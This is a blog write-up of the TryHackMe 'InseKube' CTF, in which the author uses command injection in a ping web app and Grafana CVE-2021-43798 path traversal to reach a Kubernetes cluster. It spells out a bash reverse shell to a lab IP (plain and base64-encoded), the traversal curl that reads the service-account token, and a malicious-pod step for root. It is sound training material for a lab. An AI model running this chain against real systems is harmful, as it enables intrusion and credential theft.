InseKube CTF — TryHackMe

Arrow
6 min readMar 7, 2022
Insekube CTF.

Hello everyone!
Long time not hacking/writing anything at all. Everyday life can be a little crazy from time to time (and I hope it won’t get any crazier from that point as the whole planet is in hot water-but, we are not here to discuss this one).
So, first write-up of 2022 and I’ve chose InseKube CTF as it seemed to me an interesting scenario with a quite new technology (in comparison with the traditional ones) that gets more and more fans.

So, really quick, on this challenge we are dealing with a Kubernetes setup and, along with it, a Grafana recent vulnerability.

Let’s jump into this right away!
Proposed soundtrack: https://www.youtube.com/watch?v=AxdPucdC9JI

Enumeration

First things first, the enumeration.
Having some experience with Kubernetes myself and some of the ports that might have been exposed (https://kubernetes.io/docs/reference/ports-and-protocols/), I thought that it might be a quite good idea to start with a masscan scan, instead of the casual nmap, in order to save some time waiting.

Masscan Scan.

Taking a look at the results, I was a little bit confused at first. Reading a little bit into the CTF’s description (stating that the challenge is setup inside of a Minikube), it made perfect sense why the classic K8s ports weren’t there. To give a little bit of info here, Minikube is tool, usually used for development and testing purposes, and helps the individual to set up quickly and easily a local Kubernetes cluster on the OS of their choice (https://minikube.sigs.k8s.io/docs/).

A quick check with Nmap as well, to see if we can get more info for the open ports. But nothing that we don’t already know. Let’s head to the website and see what is holding up for us.

Nmap scan.

The landing page is quite simple. Just a “ping” application that let’s you know if the host provided is ping-able or not. And here starts the real fun.

Is it up or down?

The first thing that comes into my mind, when I meet such type of setups is to try a simple remote command execution, just something reeeealy simple to put into test my suspicion.

Testing the RCE.

As it is clear from the output, the application successfully executed the ping command and right afterwards executed the ls command. Did I hear someone screaming “Reverse Shell” here?

Reverse Shell

Let’s fire up Burp Suite to capture a request to the server and change it accordingly for landing our reverse shell successfully. Also, let’s start NetCat on our port of choice.

nc -lvnp 9999

Ok, now for triggering the reverse shell and get access to the remote server all we will need is to execute the following using BurpSuite.

echo “bash -i >& /dev/tcp/10.10.118.248/9999 0>&1” | bash;

However, we will needed to inject the reverse shell in the form of base64, therefore what is going to be executed at the end on the remote server will be the piece of command below:

echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMTguMjQ4Lzk5OTkgMD4mMQo=” | base64 -d | bash;

BurpSuite Request and Reverse Shell.

Grafana LFI

Enumerating a little bit the remote host, we can see some interesting info on this env parameters and, more precisely, the fact that there is a Grafana server.

env parameters.

Grafana is no stranger to some good vulnerabilities and very recently there was discovered a pretty good one that was affected a number of Grafana versions up until 8.x (https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/). Let’s see what is the version of the Grafana instance in our case by running a simple curl on its login page.

curl http://10.108.133.228:3000/login

We will get back a pretty lengthy HTML page. Going through it really we can see that the Grafana installed is on 8.3.0-beta2 version, therefore according to the advisory linked above it is vulnerable to CVE-2021–43798.

This article, also, explains in very good details how we can use this vulnerability to access files, such as /etc/passwd. All good with it, but what should we do afterwards? Let’s move on with the next piece of the puzzle.

Kubernetes Cluster

So, we do know that this machine is hosting a Kubernetes Cluster. If you search a little bit, you will find out that the most valuable tool for managing a Kubernetes cluster is kubectl (https://kubernetes.io/docs/tasks/tools/). At first shot, it seems like kubectl is not installed for the user, however if we search for the binary itself we will find it on the /tmp directory.

On this article, you can get a look on the most used/essential kubectl commands.

The first command that I went with was the “/tmp/kubectl get pods”, in order to check if something is currently up and running on the cluster, however it seems that the user is missing the permissions for that.

Trying to get the pods.

Generally speaking, it is a very good strategy to set up an authentication mechanism in case some one -you know- malicious tries to get advantage of the Kubernetes Cluster (https://kubernetes.io/docs/reference/access-authn-authz/authentication/). The easiest way is to setup a token that you will pass it along with every kubectl command that you are running. All those tokens though are saved on the local machine on the /var/run/secrets/kubernetes.io/serviceaccount/token directory.(https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/.) Bad luck for the guys that made the setup… We definitely can make use of this Grafana LFI vulnerability to get our hands on to the cluster token.

Putting the two pieces of the puzzle together

Now that we have everything we want, let’s put it into test by running the following command and assign the output into a variable in order for us being able to work easily with it:

curl — path-as-is http://10.108.133.228:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

So here, we got ourselves the token!!

Getting the token.

Let’s try once more to disable the pods available on the default Kubernetes namespace. Bingo! The token gave us the permission we needed.

Bingo!

Final step

And now we are heading for the final step. The creator of the room has done a really good job on providing the info and the study matter for getting the root user, so I am not going to repeat it here. Just head to the challenge’s room and have a good read on it.

For this final step we will need the yaml of the malicious pod here, with a bit of atwist, as the image is already available on the minikube cluster and the remote host does not have any internet access either way. Just on the yaml file add the imagePullPolicy: IfNotPresent tag, just below the image: ubuntu tag. Pay extra attention on the spaces, while you doing that addition, otherwise the yaml won’t be accepted as a valid one from the kubernetes cluster and it will refuse to start the pod for you.

Once, we have our yaml ready on our local machine, we can fire up an HTTP Server using python, to help us download the file to the remote machine easily.

python3 -m http.server 8001

Once, we have downloaded the file on the remote machine, we can use the “kubectl apply -f” command in order to bring our “bad” pod into life.

Hello little malicious pod!

Once, the pod is turned into “Running” status, we can get an interactive shell into it.

Root!!

That’s all guys for today!
I hope you enjoyed my write-up, as much as I enjoyed writing it.
See you next time and keep hacking! :)

--

--

Arrow

A humble sysadmin, cybersecurity freak, metalhead and crazy cat lady.